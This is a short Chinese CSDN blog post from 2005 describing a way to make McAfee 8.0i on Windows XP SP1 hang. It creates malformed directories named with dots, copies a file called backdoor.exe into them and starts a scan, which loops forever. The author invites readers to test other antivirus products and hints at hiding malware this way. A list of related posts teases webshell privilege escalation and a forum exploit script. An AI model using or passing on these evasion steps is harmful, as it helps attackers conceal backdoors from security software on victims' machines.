逃过杀毒软件的法眼【ALLyeSNO】

最新推荐文章于 2019-02-24 18:32:39 发布
原创 最新推荐文章于 2019-02-24 18:32:39 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#杀毒软件 #测试 #date #xp

本文介绍了利用目录漏洞使杀毒软件报错的测试。测试环境为XP SP1,杀毒软件是MCAFEE 8.0I,通过构造畸形目录如“md..../”等步骤,最终导致杀毒软件进入死循环,还呼吁大家测试其他杀毒软件。
 

Term   : FreeXploiT

Author : ALLyeSNO

Date   : 2005-5-21

继superpig的论题的

原理用那个 ..的目录漏洞 构造畸形目录 使杀毒软件报错

呵呵

测试环境XP SP1

杀毒软件 MCAFEE 8。0I

过程

1.md ..../

2.md ...../

3.md test

4.copy backdoor.exe test

5.mcafee check

6.死循环

其他杀毒软件没测试,大家测试一下其他的看行不行吧

其实,嗯嘿嘿 ,,,自己想想吧

bat版鸡鸡管理器 【ALLyeSNO
FreeXploiT
05-07 2495
Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-8仿照kevin1986的vb版肉肉管理器的bat版鸡鸡管理器kevin这个工具蛮好玩的,其中直接调用了mstsc文件引起了我的兴趣,采用的方式可以有以下几种1。vb有现成的终端连接控件,直接添加使用2。捕获mstsc的窗口再从mdb读取信息添加3。存在命令行的发送形式,以此调用如果要写bat
MD5加强验证 挑战王小云破解 【 ALLyeSNO
FreeXploiT
05-30 4001
Author : allyesnoTeam   : freexploitDate     : 2006-05-30做梦想到了一个加强md5验证的方法 醒来了赶紧测试一下地球人都知道MD5 被王小云破了!!!破了!!!破了!!!破了!!!破~~(shut up)其实不是破了而是用他们的算法,在数个小时内就可以找到MD5碰撞。就是你用一台IBM P690数小时内能创造出两个MD5相同 内容
解决RMVB 分割软件的bug(ALLyeSNO)
FreeXploiT
10-22 3928
下载了一些影片 由于要刻盘 所以要进行分割于是呼下载了realmediaeditor gui下出现了未知错误 sure我便在cmd下使用 格式如下rmeditor -i file.rmvb -o filex.rmvb -s 0.000 -e 100.0注意临时文件夹的空间要大于分割文件的大小
中国软件集体互联网攻略
FreeXploiT
04-04 2833
文/闫辉 当超级解霸系列软件创始人梁肇新从门外匆匆走进来的时候,他的头型着实令人吃惊,染成黄色的鸡冠头型让你无法将眼前的人士和一家IT公司的老板画上等号,更无法想象他曾经为了解决一个程序技术难题三天三夜不休息。进入会议室,梁肇新一边拿出演示的笔记本和手机,一边解释说:“我这也是为了和时代接轨,与时俱进。”  手机展示的是在线视频播放,梁肇新说:“采用我们自己的音频和视频压缩格式,可以利用GPR
枚举驱动器 (ALLyeSNO)
FreeXploiT
12-15 1616
FreeXploiT原创文章原理: if 命令不能用于直接测试目录,但空 (NUL) 设备确实存在于每个目录中。因此,可以通过测试零设备确定目录是否存在。以下范例可测试目录的存在:if exist c:mydir/nul goto process @echo offrem test in win2K&winXP by ALLyeSNOclsfor %%i in (C,D,E,F,G,H,I
梦(ALLyeSNO)
FreeXploiT
03-27 1435
文:ALLyeSNO昨天晚上又做梦了有趣的是 这梦是上个星期那梦的续集 听说有的人做了梦以后那是一点都想不起来的 我比较受伤一点我做的都嘛是感伤的梦梦的内容 就像一部神妙的小说 中间穿插着一个感情的故事 让我感伤的 却又是情现实中我对感情那是麻木了 却没想到在梦里重新拾回这揪心的感觉 是在梦里对现实的渴望?是现实中无法实现而要在梦中冲破枷锁 宣泄自己? 我清醒的否认 但潜意识或者正在对此点头昨晚还
PingX(ALLyeSNO)
FreeXploiT
10-15 1672
rem pingx.bat bulid by ALLyeSNO@echo offecho use:pingx windowsnumber ipecho ex:pingx 20 127.0.0.1if "%1"=="" echo 请输入你要打开的窗口数目&&goto :eofif "%2"=="" echo 你没有输入ip地址&&goto :eoffor /l %%i in (1,1,%1) do
优快云 韩磊 外传 【ALLyeSNO
FreeXploiT
05-13 1967
话说 优快云 的 韩磊 死后去了天堂,被上帝召去面试,说是让他主持天堂的 BLOG 系统开发工作,韩磊欣喜若狂很高兴,上帝问他:你智商有160吗?我们研究一下DONEWS BLOG,韩磊说没有;上帝又问:那么你智商有140吗?我们可以探讨一下MSN 空间,韩磊说没有;上帝有点失望,继续问:那么120有吗?我们讨论讨论新浪 也行啊,韩磊还是说没有;上帝没办法,继续问:100、100总有
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
qq_43667702的博客
02-24 448
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
越夜月美丽(ALLyeSNO)
FreeXploiT
11-14 1226
每个月夜来临的时候 我总爱坐在微风吹来的凉台上 望着黑夜有些凉意 渐渐地 努力地想使心变得温暖 却有一阵阵刺痛是我太用力了 是我太刻意了。。。或许 或许 或许 会有那么一天的尽管 我不确定 但我却期待 向往
使用type传送文件(ALLyeSNO)
FreeXploiT
02-07 1542
Team   : FreeXploiTAuthor : ALLyeSNODate    : 2005-2-7G:/test>type/?显示文本文件的内容。TYPE [drive:][path]filename当然type还有其他用途G:/test>type mm.exe>allyesno.exeG:/test>allyesnoVNCrackX4by Phenoelit (http://w
CMD下修改注册表 完全攻略(FreeXploiT搜集 整理 热荐)
FreeXploiT
11-26 2870
ALLyeSNO注:先来段精彩的【 本文未包含zzzevazzz 写的do all in cmd 里面使用inf 修改注册表的 方法 】regedit虽是gui下使用的东东 但其实是有未公开的参数的 可以在cmd下使用regedit的运行参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filenam
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8781
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8611
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8413
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
迅速删除非法文件名代码的 0day 呵呵
FreeXploiT
11-12 7822
allyesno:我们会遇到很多所谓非法的文件名例如 .. con nul 等等FlowerCode 给出了以下方法可以快速删除这些文件名http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html 两行代码搞定,迅速删除使用非法文件名的文件及文件夹  2007年06月04日 星期一 19:08
fuckipb batShell
FreeXploiT
04-29 7327
这个exploit是在0x557.cn irc room superhei 那里得知的 thx exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell 运行情况输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org输入网站地址:bbs.null.com输入论坛目录 例如 http://www.ph4
CMD记录器改良版
FreeXploiT
09-29 6751
 文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)改的不是很良 勉强可用 或许应该弄多一点容错代码 体力活啊。。安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Curren
regini 可是一个好用强大的工具!
FreeXploiT
01-18 6230
My site: http://blog.youkuaiyun.com/freexploit/regini 可是一个好用强大的工具!我仔细查阅了 微软的资料 发现说的含糊不清 google了下也是 寥寥几笔这个玩意主要用途是 在cmd下 修改注册表 以及 注册表权限!用法研究了一晚上 弄出来了 ,微软上写的 根本不能用啊 郁闷。。使用方法C:/>regini regset.ini 就行啦regset.ini
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值